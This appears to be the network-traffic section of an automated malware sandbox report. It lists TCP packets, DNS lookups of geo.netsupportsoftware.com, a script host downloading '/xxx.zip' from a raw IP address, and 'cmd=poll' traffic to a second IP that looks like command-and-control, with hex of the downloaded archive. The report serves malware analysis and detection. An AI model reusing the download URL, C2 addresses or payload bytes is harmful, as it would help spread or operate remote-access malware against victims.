                                                                                              Jan 14, 2025 16:25:38.336030960 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336050034 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336050987 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336066961 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336076975 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336086988 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336098909 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336113930 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336113930 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336122990 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336129904 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336129904 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336143017 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336158037 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336165905 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336175919 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336177111 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336199045 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336199045 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336208105 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336215019 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336235046 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336235046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336245060 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336252928 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336263895 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336267948 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336287022 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336302996 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336302996 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336317062 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336323977 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336323977 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336340904 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336354017 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336426973 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336479902 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420614004 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420634031 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420723915 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420726061 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420754910 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420766115 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420789003 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420789003 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420819998 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420825005 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420845985 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420857906 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420876980 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420876980 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420897007 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420913935 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420921087 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420926094 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.420949936 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420973063 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.420984030 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421001911 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421005011 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421026945 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421036959 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421056032 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421056032 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421089888 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421089888 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421094894 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421117067 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421139956 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421153069 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421164989 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421164989 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421180010 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421184063 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421192884 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421205044 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421236038 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421245098 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421253920 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421274900 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421283960 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421293974 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421303988 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421319962 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421329021 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421339035 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421355009 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421370029 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421370983 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421381950 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421403885 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421410084 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421428919 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421446085 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421453953 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421458006 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421480894 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421505928 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421510935 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421521902 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421545029 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421551943 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421566963 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421581984 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421603918 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421606064 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421628952 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421648026 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421653032 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421667099 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421675920 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421695948 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421709061 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421711922 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421731949 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421751022 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421756983 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421763897 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421781063 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421788931 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421799898 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421816111 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421833038 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421838999 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421848059 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421871901 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421875954 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421885014 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421897888 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421911001 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421917915 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421928883 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421938896 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421952963 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421962023 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421967030 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.421982050 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.421999931 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422008991 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422018051 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422029972 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422046900 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422049999 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422064066 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422075987 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422085047 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422096014 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422118902 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422128916 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422130108 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422147989 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422167063 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422173023 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422179937 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422194004 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422213078 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422220945 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422229052 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422240973 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422257900 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422266006 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422272921 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422287941 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422296047 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422308922 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422317982 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422327995 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.422342062 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.422355890 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:48.690649986 CET49164443192.168.2.22185.157.213.71
                                                                                              Jan 14, 2025 16:25:48.690681934 CET44349164185.157.213.71192.168.2.22
                                                                                              Jan 14, 2025 16:25:48.690733910 CET49164443192.168.2.22185.157.213.71
                                                                                              Jan 14, 2025 16:25:49.020201921 CET49164443192.168.2.22185.157.213.71
                                                                                              Jan 14, 2025 16:25:49.020219088 CET44349164185.157.213.71192.168.2.22
                                                                                              Jan 14, 2025 16:25:49.020287037 CET44349164185.157.213.71192.168.2.22
                                                                                              Jan 14, 2025 16:25:49.396944046 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:49.831257105 CET4916580192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:49.836169958 CET8049165172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:49.836235046 CET4916580192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:49.836766005 CET4916580192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:49.841645956 CET8049165172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:50.500916004 CET8049165172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:50.501667976 CET4916580192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:50.576065063 CET4916580192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:50.576065063 CET4916580192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:50.589653969 CET4916680192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:50.594568014 CET8049166172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:50.594662905 CET4916680192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:50.617533922 CET4916680192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:50.622355938 CET8049166172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:51.294994116 CET8049166172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:51.295206070 CET4916680192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:51.295372009 CET4916680192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:51.295387983 CET4916680192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:51.295876026 CET4916780192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:51.300698042 CET8049167172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:51.300785065 CET4916780192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:51.300849915 CET4916780192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:51.305576086 CET8049167172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:52.072853088 CET8049167172.67.68.212192.168.2.22
                                                                                              Jan 14, 2025 16:25:52.072917938 CET4916780192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:52.073342085 CET4916780192.168.2.22172.67.68.212
                                                                                              Jan 14, 2025 16:25:52.073364019 CET4916780192.168.2.22172.67.68.212

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 14, 2025 16:25:49.779568911 CET5456253192.168.2.228.8.8.8
                                                                                              Jan 14, 2025 16:25:49.790889025 CET53545628.8.8.8192.168.2.22
                                                                                              Jan 14, 2025 16:25:49.794240952 CET5456253192.168.2.228.8.8.8
                                                                                              Jan 14, 2025 16:25:49.801624060 CET53545628.8.8.8192.168.2.22

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 14, 2025 16:25:49.779568911 CET192.168.2.228.8.8.80xaceeStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 16:25:49.794240952 CET192.168.2.228.8.8.80xaceeStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 14, 2025 16:25:49.790889025 CET8.8.8.8192.168.2.220xaceeNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 16:25:49.790889025 CET8.8.8.8192.168.2.220xaceeNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 16:25:49.790889025 CET8.8.8.8192.168.2.220xaceeNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 16:25:49.801624060 CET8.8.8.8192.168.2.220xaceeNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 16:25:49.801624060 CET8.8.8.8192.168.2.220xaceeNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 16:25:49.801624060 CET8.8.8.8192.168.2.220xaceeNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • 45.155.249.215
                                                                                              • 185.157.213.71connection: keep-alivecmd=pollinfo=1ack=1
                                                                                              • geo.netsupportsoftware.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.224916345.155.249.215803592C:\Windows\System32\wscript.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 16:25:35.527911901 CET336OUTGET /xxx.zip?mt=6364 HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 45.155.249.215
                                                                                              Connection: Keep-Alive
                                                                                              Jan 14, 2025 16:25:36.126008034 CET1236INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.24.0 (Ubuntu)
                                                                                              Date: Tue, 14 Jan 2025 15:25:36 GMT
                                                                                              Content-Type: application/zip
                                                                                              Content-Length: 2845498
                                                                                              Connection: keep-alive
                                                                                              Last-Modified: Mon, 13 Jan 2025 16:08:22 GMT
                                                                                              ETag: "2b6b3a-62b98a754cee9"
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 50 4b 03 04 0a 00 00 00 00 00 44 77 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 69 6e 73 74 61 6c 6c 2f 50 4b 03 04 14 00 00 00 08 00 0b 50 29 5a 14 81 51 7e 86 b5 00 00 7c b5 00 00 19 00 00 00 69 6e 73 74 61 6c 6c 2f 35 42 38 46 45 42 32 41 46 38 31 37 34 39 33 45 73 00 05 80 fa 7f 54 44 46 24 51 72 4c 00 00 00 b5 60 88 47 af 1c 6c 35 ca ca 04 4a ee 30 0b ac fc 54 a5 52 80 93 43 4f 67 b0 e8 c6 b3 c1 a1 91 b9 e6 b0 db 7f 3a ed 1f 97 37 3c 2d 12 23 9a 03 a0 82 51 20 90 c6 b0 1d 28 dc 14 8f fa 4d 65 17 fa 2e bd 9a 1b 49 df 54 25 51 81 a0 e5 e3 c9 7d 48 92 3b c0 c1 12 bd 33 4b df 7f 70 4d ec ab 00 6a 2b 1d 0d 4a 4a ac bb 29 9d 51 7e dd e3 78 3f d4 f6 44 c4 65 d3 f9 26 7e c5 a4 cb 66 92 18 15 e3 07 28 f4 6e 21 9f 76 0e 33 83 6f 05 6a f0 f7 f1 25 7b f8 13 9d e3 c3 62 a1 d8 a2 d1 3e 0c 9d 79 11 10 09 de 7a c7 88 00 c4 9b a4 91 db a9 9b 0e 8a 99 90 7a 0d 00 de ac 45 3e 0d 8d a6 e7 f8 f0 48 4a 44 ff 41 c2 5d d2 ff 79 dc 7b 7e 86 77 78 a6 08 5e 55 f9 3c b4 77 ca 4c 83 b5 7e aa c9 6a 16 d5 5b a8 68 [TRUNCATED]
                                                                                              Data Ascii: PKDw*Zinstall/PKP)ZQ~|install/5B8FEB2AF817493EsTDF$QrL`Gl5J0TRCOg:7<-#Q (Me.IT%Q}H;3KpMj+JJ)Q~x?De&~f(n!v3oj%{b>yzzE>HJDA]y{~wx^U<wL~j[h<:,bybY`Y0FY\FJc{ne!89Za*si]NMDy;RD[m#?\ dwTP`GVqPdg 8[2^~4#^kS5{{)W2&PG1L^Y'Qt/~#~z9:;tIbgd T#?A~f%UB/g?7d$){B#E4N:mM]LDwCA7z)Rqi-j~3Ee+q2}'{"'W{]|gKyA;x2YxiPJI];TK%bz+aQ$rMNL@S4;anOm=oCm,`oQ(&pTYp<a#xhQCN"iufA#CS43NtHcg|t&8uxLY$)Z4AtW*Z*z7'2m
                                                                                              Jan 14, 2025 16:25:36.126028061 CET224INData Raw: b9 5a 4f 19 ce 09 29 bd f0 77 20 af cf 3a 9f 4c 90 67 70 13 f1 c0 89 e7 79 13 95 fa 36 9a d9 fa 85 f7 69 80 d9 41 53 09 95 0e 02 2d e1 56 10 37 7b 0c 4f cc 80 b8 43 85 1d 98 f7 01 20 b3 0c ba 3f 56 24 09 1f 4e 50 b0 ae eb ce fe 86 d9 09 27 f5 df
                                                                                              Data Ascii: ZO)w :Lgpy6iAS-V7{OC ?V$NP'v){pkTVUQ?'aheZYyFq/O\.;'S:<E&U]jd%*$!LJ(:FX'X\"Ux\pqmYvouDO@)O
                                                                                              Jan 14, 2025 16:25:36.126034975 CET1236INData Raw: 59 b4 49 2f b4 63 1a 8f 43 fa 1e 1f 94 19 88 7c 3f e3 12 18 65 9e b5 b4 83 94 2a 54 b8 3e b6 88 4c 43 cf 1a 91 42 1a 13 92 f6 67 22 aa 4a 12 c8 7d ff dd 95 ed 74 6b f3 0b dc 6a 26 83 97 da dc 6c 14 7f 8e a4 50 55 f9 6d 69 29 95 46 e2 a3 20 45 be
                                                                                              Data Ascii: YI/cC|?e*T>LCBg"J}tkj&lPUmi)F EH^Nf-("&10PwIIe"#82+Ty}0S"{HcRm=Ges% INQuF%mT.wg-v.{}2vlx6DfW`t
                                                                                              Jan 14, 2025 16:25:36.126068115 CET224INData Raw: 77 e9 76 22 f6 4a 08 2b a8 4b a6 8c 34 17 5d a2 f3 9d 06 7a c9 2c 89 af b7 72 83 d0 a5 0d 81 9f c7 fc 19 66 b4 22 fa 42 66 4d 30 f4 1c fd 7f 82 92 dd ac 8b 50 ce 39 59 d3 f5 d8 b1 d7 2a 3b eb ab 35 39 b7 ac a3 ec dd 72 7b d4 88 de b7 7b 64 8a 97
                                                                                              Data Ascii: wv"J+K4]z,rf"BfM0P9Y*;59r{{duZtR.:a5I.;=ZMB-brR~{Gf5m4GrKzWeK>*klYmC7qWqrQJDd|(
                                                                                              Jan 14, 2025 16:25:36.126079082 CET1236INData Raw: 35 b2 9c 25 28 e5 f7 75 50 26 c1 af 71 24 5e 7c 0b fe b3 e3 f9 d8 f8 e8 84 1e fc 04 52 33 9d ce 3a 95 35 e7 44 b8 1f cb b5 67 c9 03 bc a8 14 c5 86 b2 24 f9 5a 70 79 b0 f2 27 88 49 2f 21 64 49 85 24 25 7e 27 4a b8 ac c9 f6 0a 61 78 ed 37 e9 fd 2f
                                                                                              Data Ascii: 5%(uP&q$^|R3:5Dg$Zpy'I/!dI$%~'Jax7/wuzc;7vmg^:'k>T\p8tWe"9wI^G(\!0UdDq|HS?|pIqGo0X^^^CFGob9QQ/$4nrR
                                                                                              Jan 14, 2025 16:25:36.126099110 CET224INData Raw: 2d f5 5b 74 65 18 52 01 47 bc a4 7b 12 6c f5 e4 2d 0d 75 e8 82 ae 21 99 e0 b3 6b 7d 85 39 48 7d 40 b1 1a 20 95 be fc 37 dd e4 1f 44 f0 b2 00 8c 72 59 4a f7 7a 89 cb 70 54 2c 26 23 17 24 15 13 9e e5 56 e9 e4 b6 df d5 5c 2d 4a 95 86 b0 ed 86 49 f8
                                                                                              Data Ascii: -[teRG{l-u!k}9H}@ 7DrYJzpT,&#$V\-JIMtDY4FR_~.gZMF1&70aTjFz#tY{?q,_(n);%JP5z#&vMf5c i%pm
                                                                                              Jan 14, 2025 16:25:36.126136065 CET1236INData Raw: 3b c4 ca a2 92 df 50 8e bb 6a 15 55 2d c0 f1 b8 08 3e d8 f0 5e 2b 67 a2 02 22 69 37 c0 6b a0 d7 ad d1 30 88 20 22 56 8e f3 54 29 ce 2e 6a b2 3a 9c 48 69 7c 18 a0 3b a5 76 3c d5 d4 c8 e3 88 e7 2d 71 7f c7 09 8f 90 21 a7 a0 08 ae c9 70 8f dc d3 dc
                                                                                              Data Ascii: ;PjU->^+g"i7k0 "VT).j:Hi|;v<-q!p$I{'rH']lb}D7FmSr(u&SD?OtYAu5/dKHL3bqN9,h5\orx'+(zDqi6>-aO`Hg
                                                                                              Jan 14, 2025 16:25:36.126163006 CET224INData Raw: 31 74 e1 73 b4 c3 f1 57 31 08 45 79 fc 86 1f 29 91 08 e9 c7 a0 ae aa bb 9f bb 10 2a 2f 69 2b 72 bc d7 77 29 77 ee f0 98 44 e8 d6 c5 86 87 8d e9 cd 6e 6a 2a 77 64 8a 9d c0 60 1a ed ab 36 9e b9 9f 3b d5 4f 74 14 45 f1 ac 3c 04 82 06 4a a8 00 6c 09
                                                                                              Data Ascii: 1tsW1Ey)*/i+rw)wDnj*wd`6;OtE<Jl+sR&MxOavSGK##K>l*D]!X@y`3K];[.0r4p#K35eu6Ml0UZzPDL?@od
                                                                                              Jan 14, 2025 16:25:36.126466990 CET1236INData Raw: 4d a1 75 dd 48 26 01 d8 4b 76 f3 63 b3 79 c2 92 71 0b 35 46 d3 d4 c1 51 98 3f a5 bd fa 9e 45 7e b6 45 72 06 12 58 4a 7d 15 22 18 fc 3f d8 05 02 e9 26 3d a3 f5 da 35 f0 a7 7a 07 60 e9 0d 0e e4 d6 ad 0a c1 9d d2 d8 31 52 6b 39 a9 10 6a dd cb f7 f1
                                                                                              Data Ascii: MuH&Kvcyq5FQ?E~ErXJ}"?&=5z`1Rk9jf9E93p;odzX\ .cxFqw94q%0393>fe4'+}HXNPo?a0<E2lTh?:m^xeB&V1AS%.-.
